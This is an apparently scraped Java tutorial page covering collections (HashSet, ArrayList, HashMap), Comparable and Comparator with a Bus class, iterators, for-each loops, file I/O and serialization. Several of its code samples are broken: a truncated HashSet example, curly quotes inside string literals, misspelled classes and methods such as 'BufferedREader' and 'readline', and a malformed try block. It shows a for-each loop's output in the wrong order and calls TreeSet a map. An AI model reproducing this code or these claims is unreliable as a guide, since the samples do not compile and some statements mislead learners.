fixed size whereas collections do not have a fixed size. General Purpose Collection Implementations Let us now look at an example of the HashSet. public class HashSetExample { public static void main(String args[ ]) { // HashSet declaration Set); } } The declaration of the HashSet is specialized to the type string, so it will only accept the string type. We then add a few values to the HashSet. We know that, collections also accept duplicate values, therefore, in our code we are adding two duplicate values. We can also add null values as collections accept reference types and reference types are allowed to point to nothing. This is an example of the ArrayList. public class ArrayListExample { public static void main(String args[ ]) { /*Creation of ArrayList: add String elements so I made it of string type */ List<String> obj = new ArrayList<String>(); /*This is how elements should be added to the array list*/ obj.add("Ajit"); obj.add(“Sam"); obj.add(“Robert"); obj.add("Steve"); obj.add(“Soumya"); /* Displaying array list elements */ System.out.println("Currently the array list has following elements:"+obj); /*Add element at the given index*/ obj.add(0, "Rahul"); obj.add(1, "Justin"); } } Here, we create a List object and specialize it to the ArrayList with a generic implementation of the type string which mentions that it can take only strings. We then add a few string values and then we can prit out the entire list. Let us now look at the next collection which is the HashMap. Let us look at an example where at the start of the program, we are creating an object of the map. The map takes, a key and a pair value. We are specializing this to an integer so that all key should be of the type INT and all the values to the corresponding key should be of the type string. public class Details { public static void main(String args[ ]) { /* This is how to declare HashMap */ Map<Integer, String> hmap = new HashMap<Integer, String>(); /*Adding elements to HashMap*/ hmap.put(1, “Sam"); hmap.put(2, "Rahul"); hmap.put(3, "Singh"); hmap.put(9, "Ajeet"); hmap.put(14, "Anuj"); /* Display contentCollection Implementation Example using Iterator*/ —HashMap in Map Iterator<Map.Entry<Integer,String>> it= hmap.entrySet().iterator(); while(it.hasNext()){ Map.Entry<Integer,String> e=it.next(); System.out.print("key is: "+ e.getKey() + " & Value is: "); System.out.println(e.getValue()); } /* Get values based on key*/ String var= hmap.get(2); System.out.println("Value at index 2 is: "+var) } } This is the hierarchy of the collection framework. These are the interfaces that are available. There are three interfaces that inherit from Java collection, which is: the list, queue, set In terms of the list, we have ArrayList that we've used earlier; in terms of queues, we have linked list in PriorityQueue, which is implemented as a queue. In terms of sets, which hold the key pair values, as we've seen in the HashSet. In terms of the map, we have HashMap, HashTable, SortedMap, and TreeSet. So these are the set off collection classes that also provide, the hash table or a key pair value storage mechanism. The comparable interface is a member of the “java.lang” package. By implementing the Java comparable interface, you can provide order to objects of any class. You can also sort collections that contain objects of classes that implement the Comparable interface. Some Java classes that can implement the comparable interface are Byte, Long, String, Date, and Float. To write custom comparable types, you need to implement the compareTo method of the Comparable interface. The Comparable interface can be used to implement a compareTo method. This compareTo method can be used specifically when we are sorting custom objects. We can use it to evaluate whether the value of one object is larger than the other object and accordingly decide how to sort those objects. In the next section, we will learn about the Java comparator. The comparator interface is used to order the objects of the user-defined class. For example, consider the Student class described previously; the sorting of students was restricted to sorting on GPAs. A comparator object is capable of comparing two objects of two different classes. In the next section, we will look at the Java comparable and comparator example. Let us see an example. We are creating a new package called comparable comparator demo. We create a class called bus that implements the comparable interface. The comparable interface is specialized to the type Bus. We have getter and the setter for the bus id and the bus name to retreive and store values. We also have a getter and setter for the fare and also for the ratings. package comparable_comparator_demo; public class Bus implements Comparable<Bus>{ private Integer busId; private String busName; private Double fare; private Double ratings; public Integer getBusId() { return busId; } public void setBusId(Integer busId) { this.busId = busId; } public String getBusName() { return busName; } public void setBusName(String busName) { this.busName = busName; } public Double getFare() { return fare; } public void setFare(Double fare) { this.fare = fare; } public Double getRatings() { return ratings; } public void setRatings(Double ratings) { this.ratings = ratings; } @Override public String toString() { return "Bus [busId=" + busId + ", busName=" + busName + ", fare=" + fare + ", ratings=" + ratings + "]"; } public Bus() { } public Bus(Integer busId, String busName, Double fare, Double ratings) { super(); this.busId = busId; this.busName = busName; this.fare = fare; this.ratings = ratings; } @Override public int compareTo(Bus o) { // TODO Auto-generated method stub return o.busId.compareTo(this.busId); } } From the above example, we will now create the main class: package comparable_comparator_demo; import java.util.ArrayList; import java.util.Collections; import java.util.List; public class BusMain { public static void main(String[] args) { // TODO Auto-generated method stub Bus b1 = new Bus(1000, "Wipro Travels", 1500.50d, 4.8d); Bus b2 = new Bus(1200, "Java Travels", 1200.50d, 3.8d); Bus b3 = new Bus(1100, "J2EE Travels", 1750.50d, 4.9d); Bus b4 = new Bus(1010, "JME Travels", 1250.50d, 2.1d); Bus b5 = new Bus(1001, "List Travels", 1100.50d, 3.2d); Bus b6 = new Bus(1900, "WOOW Travels", 1800.50d, 4.1d); List<Bus> busList = new ArrayList<>(); busList.add(b1); busList.add(b2); busList.add(b3); busList.add(b4); busList.add(b5); busList.add(b6); Collections.sort(busList); System.out.println("Printing all the buses"); for (int i = 0; i < busList.size(); i++) { System.out.println(busList.get(i)); } System.out.println(); System.out.println(); Collections.sort(busList, new FareComparator()); System.out.println("Printing all the buses sorted based on Fare"); for (int i = 0; i < busList.size(); i++) { System.out.println(busList.get(i)); } System.out.println(); System.out.println(); Collections.sort(busList, new RatingComparator()); System.out.println("Printing all the buses sorted based on Ratings"); for (int i = 0; i < busList.size(); i++) { System.out.println(busList.get(i)); } System.out.println("Printing busses using foreach"); for(Bus b:busList){ System.out.println(b); } } } Rate Comparator syntax from the example: package comparable_comparator_demo; import java.util.Comparator; public class RatingComparator implements Comparator<Bus> { @Override public int compare(Bus o1, Bus o2) { // TODO Auto-generated method stub return o2.getRatings().compareTo(o1.getRatings()); } } Fare Comparator syntax from the example: package comparable_comparator_demo; import java.util.Comparator; public class FareComparator implements Comparator<Bus> { @Override public int compare(Bus o1, Bus o2) { // TODO Auto-generated method stub return o1.getFare().compareTo(o2.getFare()); } } Iterator is used for looping through various collection classes such as HashMap, ArrayList, LinkedList, and so on. It is used to traverse collection object elements one by one. It is applicable for all Collection classes. Therefore, it is also known as Universal Java Cursor. It supports both READ and REMOVE Operations. The syntax of Iterator: Iterator<E> iterator() Let us now look at an example for the iterator. Here, we are importing three packages, the iterator package, the LinkedList package, and the List package. We create an object of the type LinkedList and add three names to it, John, James, and Joseph. import java.util.Iterator; import java.util.LinkedList; import java.util.List; public class ExternalIteratorDemo { public static void main(String[] args) { List<String> names = new LinkedList<>(); names.add(“John"); names.add(“James"); names.add(“Joseph"); // Getting Iterator Iterator<String> namesIterator = names.iterator(); while(namesIterator.hasNext()){ // Traversing elements System.out.println(namesIterator.next()); } } } The For-each loop in Java is used to make the code clearly readable and also eliminates the programming errors. The Syntax for Iterator For-each Loop is given by : for(data_type variable : array | collection){ } Let us now look at an example of the for-each loop. We have a simple integer array that takes four elements. class ForEachExample1 { public static void main(String args[ ]){ int arr[]={17,26,65,24}; for(int i:arr){ System.out.println(i); } } } Output: 17 24 26 65 The various Java file handling methods include - Creating File objects Manipulating File objects Reading and Writing file streaming File handling is saving data by creating a file on your file system. The file could be in the form of a text, a binary, or an XML. You can also manipulate those files by opening them, deleting them, inserting data, appending data to the file etc. While reading and writing, we make use of the file stream. We can save all the data in the file stream and simply flush that data at one shot into the file. Hence, instead of having three round trips over the network, we will have a single round trip to push data into the file. This is what is meant by file streaming. It is a temporary storage area, therefore, it is not required to keep doing I/O operations. I/O operations or reading and writing to the file frequently is expensive from a performance perspective and will hence degrade the performance of the application. Thus, the streaming feature prevents performance degradation. The File class provides several utilities for handling files and obtaining information about them. You can create a File object that represents a directory and then use it to identify other files. File myFile; myFile = new File (“myfile.txt”); myFile = new File (“MyDocs”, “myfile.txt”); File myDir = new File (“MyDocs”); myFile = new File (myDir, “myfile.txt”); After creating a File object, we can use one of the following methods to gather information about the file. File Names: The following are the methods that return file names: String getName() String getPath() String getAbsolutePath() String getParent() boolean renameTo (File newname) General File Information and Utilities: The following methods return General File Information: long lastModified() long length() boolean delete() Directory Utilities: The following methods will provide directory utilities: boolean mkdir() String[ ] list() File Tests: The following methods will provide information about file attributes: boolean exists() boolean canWrite() boolean canRead() boolean isFile() boolean is Directory() boolean isAbsolute() boolean isHidden() In Java, we can use java.io.BufferedReader to read content from a file. import java.io.*; public class ReadFile { public static void main (String [ ] args) { File = new File (args[0]); try { //Create a buffered reader // to read each line from a file. BufferedREader in = new BufferedReader (new FileReader(file)); String s; To write a file we make use of the following method: Files.write(Paths.get(fileName), content.getBytes(), StandardOpenOption.CREATE); This is explained with an example below using the try-catch blocks. try { // Read each line from the file s = in.readline(); while (s != null) { System.out.println(“Read: “ + s); s = in.readline(); } } finally { // Close the buffered reader in.close(); } } catch (FileNotFOundException e1) { // If this file does not exist System.err.println(“File not found: “ + file); s = in.readline(); } catch (IOException e2) { // Catch any other IO exceptions. e2.printStackTrace(); } } } Serialization is a mechanism for saving the objects as a sequence of bytes and rebuilding the byte sequence back into a copy of the object later. For a class to be serialized, the class must implement the java.io.Serializable interface. The Serializable interface has no methods and only serves as a marker that indicates that the class that implements the interface can be considered for serialization. The difference between the file.io and serialization is that in file.io we simply take data and save it to the file, whereas in serialization, we are actually saving an object. Serialization stores data along with structure and hence we can serialize an entire object to a file. Thus, we can retrieve both the state and structure of the object and this process is called as deserialization. Java Certification Training caught your attention? Check out our course preview now! When a field is a reference to an object, the fields of that referenced object are also serialized if that object’s class is serializable. The tree or structure of an object’s fields, including these sub-objects, constitutes the object graph. If the object graph contains a non-serializable object reference, the object can still be serialized if the reference is marked with the transient keyword. public class MyClass implements Serializable { public transient Thread myThread; private String customerID private int total; } From this example let us learn how exactly serialization is done. Here, we are creating a new Date object and we are putting a try block because it helps in saving data to a file and there is a high probability that there could be an exception. We create an output stream giving the name of date.serialization (date.ser), then we create an object output stream and passing it with a reference of f; where, f is the name of the file to save. public class SerializeDate { SerializeDate () { Date d = new Date (); try { FileOutputStream f = newFileOutputStream (“date.ser”); ObjectOutputStream s = new ObjectOutputStream (f); s.writeObject (d); // Serialization starts here s.close (); } catch (IOException e) { e.printStackTrace (); } } public static void main (String args[]) { new SerializeDate (); } } After serializing the data from the previous example, we will now look at deserializing the data and converting it from the data we have saved in the file to an object. Thus, we create a date object and assign it to null. We create an object input stream object and pass it a reference of file f. We then create, s.readObject which means it will read the object from the file called date.ser then we forcibly do a type cast to the type date and store that data in d. public class DeSerializeDate { DeSerializeDate () { Date d = null; try { FileInputStream f = newFileInputStream (“date.ser”); ObjectInputStream s = new ObjectInputStream (f); d = (Date) s.readObject ();// Serialization starts here s.close (); } catch (Exception e) { e.printStackTrace (); } System.out.println(“Deserialized Date object from date.ser”); System.out.println(“Date: ” +d); } public static void main (String args[]) { new DeSerializeDate (); } } Let us summarize what we have learned in this java additional topics tutorial : Java inner class or nested class is a class that is declared inside the class or interface. There are several purposes of implementations of core interfaces (Set, List, and Map) in Collection framework. A thread is an independent path of execution within a program. By implementing the Comparable interface, you can provide order to the objects of any class. The Comparator interface provides greater flexibility with ordering. Serialization is a mechanism for saving the objects as a sequence of bytes and rebuilding the byte sequence back into a copy of the object later. Thus, we come to an end to the Java Additional Topics Tutorial. A Simplilearn representative will get back to you in one business day.
https://www.simplilearn.com/additional-core-java-topics-tutorial
CC-MAIN-2019-22
refinedweb
3,871
56.96
31720/mysql-workbench-functionalities The functionalities of MySQL Workbench are as follows: MyISAM is the default table that is ...READ MORE The following TRIGGERS are allowed in MySQL: BEFORE ...READ MORE You can try out the following query: INSERT ...READ MORE using MySql.Data; using MySql.Data.MySqlClient; namespace Data { ...READ MORE MySQL Workbench is mainly available in three ...READ MORE There are mainly two MySQL Enterprise Backup ...READ MORE There are majorly three ways to export ...READ MORE If you are using MySql workbench then ...READ MORE MySQL Workbench is a designing or a ...READ MORE You can add commas to the left and ...READ MORE OR Already have an account? Sign in.
https://www.edureka.co/community/31720/mysql-workbench-functionalities
CC-MAIN-2020-16
refinedweb
114
71.51
First: Materials We are going to use an Altair: It will have connected a AC adapter and a SERVO motor. The actions the Altair will have are going to be: - Serve a little bit - Serve half - Serve a lot - Toggle (manual) The only difference among the modes are the time the servo motor will take being open, also, the aperture. Additionally the manual mode was created in order to clean the system. The material used for this tutorial was: - 2 Altair - 1 Servomotor - 2 Clamps - 1 Empty water bottle - 1 Cutter Of course you can make your own design, I made it with materials I found in my house. The other Altair will be used as the Hub, so we can interact with the Feeder via Internet. Additionally, I used a 5V and 500mA AC Adapter plugged into the Altair Step 2: Making Of The explanation of the code is entirely made inside the code as comments. Whatever doubt you have, feel free to ask. #include <Wire.h> #include <Mesh.h> //This header is for the Aquila-only functions #include <AquilaProtocol.h> //This header is for the Aquila-only functions<br> #include <Servo.h> //Header needed for making use of the servo functions Servo a; //Here, we name the servo ‘a’, so we can call it. int pos = 0; bool isClosed = true; //This variable is for toggle function only. //This applies for the next 3 functions: //a.write(N) it says that when the function begins, the servo will move until position N (knowing that they can move from 0 to 180 degrees). //After this, it will wait (delay) for M miliseconds; 1000ms = 1 second. //After the delay, it will procced to write a new position to the servo, in this case is 9,for this is the grade where THIS servo in particular won’t force (this varies among servos, they don’t cover their entire 180 degrees; you’ll hear a buzz if you’re exceeding it’s limit). bool serve1(uint8_t param, bool gotParam) { a.write(80); delay(1000); a.write(9); } bool serve2(uint8_t param, bool gotParam) { a.write(50); delay(1000); a.write(9); } bool serve3(uint8_t param, bool gotParam) { a.write(40); delay(650); a.write(9); } //Toggle fuction is based on the previous functions. It "will wonder" if the servo is opened or closed. Knowing this, will proceed to close or open, accordingly. bool toggle(uint8_t param, bool gotParam) { if (isClosed) { isClosed = false; a.write(80); } else { isClosed = true; a.write(9); } } void setup() { a.attach(9); //Servo motor plugged to Altair's pin 9. a.write(9); //Servo stops vibrating/buzzing at 9º, so it's initial position is 9 being closed. (It's mere coincidence that the pin and degrees are the same). Mesh.begin(); Aquila.begin(); Aquila.setClass("mx.makerlab.test"); Aquila.setName("Feeder"); //Text among quotes is the one will appear on the hub as a button. //Right after the quoted text is que name of the fuction that will be called whenever the button on the hub is clicked. This is an Aquila-only function Aquila.addAction("Serve a lot", serve1); Aquila.addAction("Serve half", serve2); Aquila.addAction("Serve a little bit", serve3); Aquila.addAction("Toggle", toggle); Mesh.announce(HUB); //This line is needed in order for this Aquila appears on the hub } void loop() { Mesh.loop(); Aquila.loop(); } 2 Discussions 4 years ago on Introduction This is great! Have you already tried it? Which kind of food it will dispense? I am planning to build something similar, but my concerns is that food may get stuck between the cap and the bottle. This would lead the servo to force and overheat? Reply 4 years ago on Introduction Thanks for commenting! And yes, we've already tried it! Although our dispenser was a mere protoype and we've only tried it with some candies and dog food, had no problems with that. Consider materials of the same size, cereal for instance. I'd recommend changing the materials and design If you want to use it for a daily basis. :)
https://www.instructables.com/id/Make-a-Pet-Feeder-using-Altair/
CC-MAIN-2019-26
refinedweb
681
75.71
Vim is old and popular text editor. Vim roots goes to the vi. Vim is improved version of vi. Vim has a lot of features that makes users life better. One of the most loved vim feature is syntax highlighting. Syntax highlighting makes text or code easily readable by coloring statements. For this tutorial we will use following C code. Save this file as my.c . #include "stdio.h" int main(){ if(1==1) printf("I love Poftut.com\n"); } Open File With Vim We will open file with vim and insert code above. $ vim my.c Press i to switch insert mode and paste code above and then save the code with Escape : w Turn On Highlighting We will use :syntax on command in the vim in order to turn on or enable syntax highlighting :syntax on Turn Off Highlighting We will give following command to turn off :syntax off Make Highlighting Setting Persistent Highlighting setting can be made persistent by adding setting to the setting files. There is two setting files to configure vim . First one is user setting file which is active for the current user and located in the current user home directory. This setting file is preferred system wide setting file. $ echo "syntax on" >> .vimrc Second setting file is system wide and locate at /etc/vim/vimrc . Same setting can be added to this file. This operation requires root privileges $ sudo echo "syntax on" >> /etc/vim/vimrc
https://www.poftut.com/vim-syntax-highlighting-turn-off/
CC-MAIN-2022-21
refinedweb
242
75.4
Coordinates: 40°45′37″N 73°58′32″W / 40.76028°N 73.97556°W / 40.76028; -73.97556 The Stork Club was a famous nightclub in New York City from 1929 to 1965. From 1934 onwards, it was located at 3 East 53rd Street, just east of Fifth Avenue. The building was demolished in 1966 and the site is now the location of Paley Park. The Stork Club was owned and operated by Sherman Billingsley (1896-1966), an ex-bootlegger who came to New York from Enid, Oklahoma [1]. From the end of Prohibition until the early 1960s, the club was the symbol of Café Society. Movie stars, celebrities, the wealthy, showgirls, and aristocrats all mixed here. El Morocco had the sophistication, and Toots Shor's drew the sporting crowd, but the Stork Club mixed power, money, and glamour. The Stork Club first opened in 1929 at 132 West 58th Street [2], just down the block from Billingsley's apartment at 152 West 58th Street[3]. Prohibition agents closed the club on December 22, 1931 and it moved to East 51st Street for three years [4]. In 1934, the Stork Club moved to 3 East 53rd Street, where it remained until it closed on October 4, 1965. According to Ralph Blumenthal in his 2000 book Stork Club, another New York nightclub owner named Tex Guinan (Mary Louise Cecilia Guinan) introduced Billingsley to her friend, the entertainment and gossip columnist Walter Winchell, in 1930. In his column in the Daily Mirror, Winchell once called the Stork Club "New York's New Yorkiest place on W. 58th". The activities of the "boldface" celebrities at the Stork Club were chronicled by the "orchidaceous oracle of cafe society," Lucius Beebe, in his syndicated column "This New York." The notable guests included Ernest Hemingway, Charlie Chaplin, J. Edgar Hoover, Frank Costello, Dorothy Kilgallen, the Duke and Duchess of Windsor (once given the cold shoulder there by Winchell), the Kennedys, Elizabeth Taylor, Gloria Vanderbilt, the Roosevelts, the Harrimans, Frank Sinatra, the Nordstrom Sisters, Brenda Frazier, Gene Tierney, Judy Garland, Erik Rhodes, Lucille Ball, Marilyn Monroe, Bing Crosby,Tallulah Bankhead, and Dorothy Lamour (who was turned down as a club singer by Billingsley early in her career). The sanctum sanctorum, the Cub Room ("the snub room"), was guarded by a captain known to everyone as "Saint Peter" (for the saint who guards the gates of Heaven). Billingsley's mistress for a number of years was Ethel Merman. One oft-repeated story involved Billingsley's alleged prejudice against non-white patrons. Arriving at the club with singer Lena Horne on his arm, actor George Jessel was stopped by Billingsley who was said to have inquired, "And just who made your reservation?" Never at a loss for words, Jessel replied, "Abraham Lincoln did". In 1951, Josephine Baker made charges of racism against the Stork Club after she ordered a steak and was still waiting for it an hour later. Actress Grace Kelly, who was at the club at the time, rushed over to Baker, took her by the arm and stormed out with her entire party, vowing to never return (and she never did) [5]. The Stork Club was a television series hosted by Billingsley, who circulated among the tables interviewing guests at the club. Sponsored by Fatima cigarettes, the series ran from 1950 to 1955. The Stork Club was also featured in several movies, including The Stork Club (1945), Executive Suite (1954), and My Favorite Year (1982). player Christopher Emanuel Balestrero, who was falsely accused of committing robberies around New York. Scenes involving Balestrero playing the bass were actually shot at the club. The film's screenplay, written by Maxwell Anderson, was based on a true story originally published in Look magazine. The Stork Club was featured in the second season episode of AMC's drama series Mad Men titled "The Golden Violin." The club provided the setting for a party attended by Don and Betty Draper in celebration of comedian Jimmy Barrett.. stock | retire | vm Why are we here? All text is available under the terms of the GNU Free Documentation License This page is cache of Wikipedia. History
http://wiki.xiaoyaozi.com/en/Stork_Club.htm
crawl-002
refinedweb
693
67.89
Storing Your Data in C++ Standard Library Containers - Introducing the Vector - Demonstrating Vectors - Summary If you've worked with some of the newer high-level languages such as Python or PHP, you might have become a tad bit jealous at some of the fancy data structures available in those languages. For example, Python includes a handy list structure that you can put pretty much anything in. Even better, the structure is built right into the syntax of the language. Such structures that hold other data are called containers. An array is a very simple example of a container. C++, on the other hand, has its roots in C, which was a low-level language. As a result, we still don't have any high-level containers built right into the language syntax beyond simple arrays. But thanks to the ability to essentially extend the language by writing sophisticated data structures, we do have at our disposal several standard classes that serve as containers. As of 1998, these container classes are officially part of the language, even though they're not part of the syntax. Rather, they're part of the official Standard Library. But unlike languages such as Python, when you create container in C++, you can't just put anything you want inside the container. Instead, when you create the container you specify what datatypes the container can hold. This is because, unlike other modern languages, C++ is strongly typed. Introducing the Vector The vector is one of the simplest containers in the Standard Library. Think of it as a souped-up array. You can store items in it just as you can in an array, except that you can manage this task more easily than with an array. Before I show you an example of a vector, however, I need to warn you: The Standard Library makes heavy use of C++ templates. If you're familiar with templates, you can skip to the next section. If you're not familiar with templates, let me give you the 60-second rundown. Templates are not as hard to understand as people make them out to be. A template is simply a cookie cutter for a class. When you use a template, you create a new class based on a template. For example, you might have a template for a class that holds a single public member variable. This template serves as a cookie cutter by which you can create a new class. But that's boring. To liven it up a bit, let's say that the template can allow you to specify the member variable's datatype when you make your new class based on the template. Get it? The template is a cookie cutter for a class, allowing you to customize the class you're cookie-cutting. Here's a sample template that shows this concept: template <typename T> class CookieCutter { public: T x; }; This code isn't a class! It may look like a class, but really it's a template that you can use to create a class. The first line specifies that I have a template, and the stuff inside angle brackets says that I'll specify a type for T later on, when I create a class. The public member x doesn't have a real type yet; it just has the filler name T. Here's a program that demonstrates how to create a class based on this new template: #include <iostream> #include <string> using namespace std; template <typename T> class CookieCutter { public: T x; }; int main() { CookieCutter<int> inst; inst.x = 10; cout << inst.x << endl; CookieCutter<string> inst2; inst2.x = "hello"; cout << inst2.x << endl; } Inside main, it looks like I'm creating an instance of CookieCutter. But I'm not. Instead, I'm creating an instance of a class called CookieCutter<int>. That's a class that the compiler will create based on the template called CookieCutter, using the type int for the T part of the template. Thus, in the class CookieCutter<int>, the public member x is an integer. The member is an integer in the next line, where I save 10 in the member. Next, I print out the value. Then I create an instance of a different class, this time CookieCutter<string>. This is a separate class from CookieCutter<int>, and this time the public member x is type string. You can verify this fact, because I save a string, hello, inside the member, and print it out. Thus, from this one template, I created two separate classes, CookieCutter<int> and CookieCutter<string>. Before I move on, I want to point out one important little tidbit about C++. Notice that I used the keyword typename in the first line of my CookieCutter template. If you prefer, you can instead use the keyword class in place of typename. It means the same thing in this context. Either is fine and they both work the same. Most people use the keyword class, but I prefer the keyword typename because it doesn't really make logical sense to say class when you're planning to specify types (such as int) that aren't classes. But that's just personal preference; use whichever you want. They work the same.
http://www.informit.com/articles/article.aspx?p=102155&amp;seqNum=3
CC-MAIN-2018-26
refinedweb
879
72.66
The pipelines and other actions to take code from the programming phase to subsequent stages. Visual Builder Studio is the Oracle counter offer to the Azure DevOps service that seems to have become more or less an industry standard. It is available for free for anyone who is a paid Oracle Cloud customer for any other service. Customers do have to pay for the compute instances that are engaged for builds and other actions . I wanted to try out this revamped service. In this article I share my first steps to get going – including a simple pipeline for testing (with Jest) and code checking (with SonarQube) a NodeJS application. The first challenge I had to overcome was to even find where and how to get an instance going of the Visual Builder Studio; that was not so easy – and the documentation was not correct on this part. Steps: - Create an instance of Visual Builder Studio - Configure a Git repository (in this case a public repository on GitHub) - Create a Build VM Template for Node JS applications - Create a Job for building a NodeJS application – including retrieval of sources from a Git repository, checking the code quality, unit testing the code and building an artifact Create an Instance of Visual Builder Studio There is no entry for Visual Builder Studio in the OCI Console. It took me a while to figure this out. There is of course a way to create an instance – that eventually I managed to find and leverage. It starts with the Service User Console that can be opened from the Profile menu in the OCI Console: This console is the frontend of the Classic Cloud – or at least that is what it reminds me of. On this console, find the Visual Builder Studio service: and click on this service tile. This page opens. Click on the button to create a new instance. Provide the requested details for this new instance: then press Next. An overview is presented. If you like what you see, then press Create. The instance creation is now in progress. After a few minutes, the instance has been prepared and it can be used. Click on the instance name to access the instance. Note: I have not been able to find a way access the VB Studio instance directly from the OCI Console. Here is the welcome screen in my brand new VB Studio instance: I am invited to set up my OCI account so that is what I will do next. Note: I have first created an OCI Compartment for resources that I will be using (and billing for and reporting on) specifically for VB Studio: Then I proceed to set up the OCI connection in VB Studio. Note: the fact that this is needed at all is another indication that VB Studio is still not fully integrated in OCI. Click on connect. Provide OCIDs for tenancy and user, indicate the region and provide a primary key for this user. Enter the id of the compartment to use (for me the especially created compartment) and the storage namespace in OCI Object Storage. Validate the connection details. Then press Save. Click on the Projects tab. Then click on Create to create the new project. Provide name and details for the new project. Click on Next. Select the Wiki Markup style. Then press Finish. The Project is then initialized. This will take 20-40 seconds. We can now get going for real – in the project environment that is now available to us. We can create issues and boards. We can configure Git repositories and Docker image registries. Refine the Maven and Gradle repositories and the NPM registry. And define Jobs and Pipelines to automate build, delivery and deployment actions. Configure a Git repository in the VB Studio project VB Studio provides its own Git repository infrastructure. We can create repositories in the context of a project. Alternatively, we can make use of external Git repositories. These can be mirrored into an internal (read only) Git repo inside VB Studio, or in build jobs we can refer directly to the URL of a public Git repository. When a repo is mirrored, VB Studio will periodically poll the external repository and synchronizing recent changes to the local mirror. Unfortunately, VB Studio cannot currently be triggered through WebHooks to immediately synchronize upon a commit. In this article, I will work with a public GitHub repo and not make use of mirroring: . Create a Build VM Template for a NodeJS application (to use for instantiating a build server) Before you can create a Build step that uses Node.js, you must create a Build VM template that includes the Node.js software and add a Build VM that uses that Build VM template. The template can be created from scratch or software can be added to an existing template. When you create a Build VM template, VB Studio adds Java, and some required software packages to it. These default software packages are called Required Build VM Components. If you need more software packages in the VM template, you can add the packages from the VB Studio Software Catalog. Select the Organization tab. Then select the Virtual Machine Templates tab. And click on Create Template. Enter the name and a description of the new template: Press Create. The new VM Template is created – with default software assigned to it. Press Configure Software to open the page where specific software required for building the application can be added to the template. Add the Node.js 14 software package. Then press Done. See this piece of documentation on managing Build VM Template. Add a Build VM for Building Node.JS applications To add a Build VM, you specify: 1. The Build VM template for Node.js applications When a Build VM starts, VB Studio installs the operating system and the Node.js 14 software I’ve defined in the template on the VM. 2.. 3. VM’s shape A shape is a template that determines the number of CPUs, amount of memory, and other resources allocated to a newly created instance. To learn more about shapes, see VM Shapes. 4.. Open the Virtual Machines tab. In the popup, select the OL7 for NodeJS template. All default values are fine: Quantity, Region, Shape and VCN Selection. This will use the VCN that was created when the OCI Connection was set up for this VB Studio instance. Press Add. The VM is now added to the pool of build machines that this VB Studio instance can pick from. The VM will be started when a job is scheduled for execution. This will take some time. You can also start the VM explicitly. Configure SonarQube Server I would like to make use of SonarQube for scanning the code and assessing its quality. VB Studio does not provide a SonarQube server. We need to make sure we have our own SonarQube server running somewhere; if we have the URL and other details, we can register this server with VB Studio and use it in our build jobs. Note: in my earlier article I demonstrated how to run a SonarQube Server in a Docker Container on an OCI Always Free VM. On the Project Administration page, click on Builds. Then select the SonarQube Server tab. Enter the details for the SonarQube Server. Create a Job for building a NodeJS application Creating a Job (definition) is done from the Builds tab. Just click on Create Job. Enter the name of the Job (in my case Build Probe because this job will build my Probe function) and select the Build VM Template to use: the new OL7 for NodeJS template. Click on Create. Next, click on Configure. On the Job Configuration pane select the Git tab and add a Git repository. The form appears for configuring a Git repository. This configuration step took me quite some time. The URL for the remote GitHub repo can be taken from the Code | Clone HTTPS URL – and should include the .git extension. The default value for the Branch or Tag field in Visual Builder Studio is master. However, in my case (as in most I think) the main branch is called main. You need to ensure the correct value for this field is set. On the tab Before Build, we can define various actions to execute before the actual build job is started – but after the sources have been fetched from the Git repository. Here I have configured two of these: Configure SonarQube Server and perform Dependency Vulnerability Analysis. The former makes sure that environment variables are set with the SonarQube Server details and the latter inspects dependencies – such as NPM modules in my Node application – for known vulnerabilities. See documentation. Next, open the Steps tab. Here we can define the actual actions to be performed during the build. I will create a step of type (UNIX/Linux) Shell Script to work with NPM to test, sonar scan and possibly inspect and manipulate (ESlint for example) in other ways The shell actions are fairly simple: cd probe # change into the directory that contains the resources for the Probe application npm install # install all npm dependencies npm run test # run the test (through Jest) for the application npm run sonar # run the sonar scan and publish both the scan and test results to SonarQube server Finally, to finalize the definition of the job, open the After Build tab. We can define several types of actions to have Visual Builder Studio take after the build steps are done. I was hoping that VB Studio could publish the SonarQube scan results to the server – but it seems not to be able to do so for a NodeJS application. The publication to SonarQube Server is now done by the npm run sonar step in the Shell Script. I am still trying to find a way to have the Jest test results published in JUnit format. Hopefully I can then make use of the JUnit Publisher action available in the After Build tab. One other common After Build action is Artifact Archiver. This is used to bundle build products into an archive that is retained in the job run. Archived artifacts can be downloaded manually or used as input for other jobs. Run the Job The Job can be automatically triggered by changes in the sources.; I did not configure that for this job. Alternatively, a job can be triggered manually. Simply click on the Build Now button to start the job. When the button is clicked, the job is scheduled for execution. An executor is looked for – a build VM that is running and available to work on the job. If you are in luck, the job can be picked up right away. If not, the job will have to wait. Here is an overview of a number of executions of the job Build Probe. Not all runs were successful (color of the bars and status icons). Not all took the same time (height of the bars). We can inspect the details of a job run by clicking on the job identifier link. I can drill down on the Build Log to take a look at the step by step detailed output from the job. Links will be enabled to for example artifacts, JUnit test reports, SonarQube and Vulnerabilities if these are applicable. In this case, unfortunately VB Studio does not know about the SonarQube Scan and Reporting that my Job has performed, so no link is available to the SonarQube Server, even though the results of the Job have been published and can be inspected on the SonarQube Dashboard. and specifically the test results: I am not sure why the Artifact is not available. There is no reference in the build log to the post build action to archive the build results into an Artifact, and there is no link to the Artifact. I also do not know why the Vulnerabilities link is not enabled – even if there are no vulnerabilities, the scan was performed and the result should be reported. Conclusion Visual Builder Studio is a fairly intuitive environment. It was not too hard for me to get started. With a code base on GitHub, creating a Job to test and QA my application was fairly simple. However, it seems that VB Studio is much more geared towards Java (Maven and Gradle) applications and is not [yet] up to speed with my Node application. Getting SonarQube results, Test Reports or Artifacts to download seems not possible at this moment. My next step will probably be an attempt to build and deploy Function to OCI, using the Fn CLI. Since this CLI is explicitly available for creating Job Steps, I have some faith that this will go fairly smoothly. I probably will create a Pipeline with at least two jobs – one for build (test, QA, build container image for function) and one for delivery (push to Container Image Registry) and one for deploy (roll out function to live FaaS environment on OCI, run test invocation). Resources Oracle Cloud Documentation on creation of an OCI based instance of Visual Builder Studio. Documentation on building NodeJS applications YouTube Playlist on Visual Builder Studio:
https://technology.amis.nl/continuous-delivery/get-going-with-automated-ci-cd-on-oci-in-visual-builder-studio/
CC-MAIN-2021-17
refinedweb
2,206
72.66
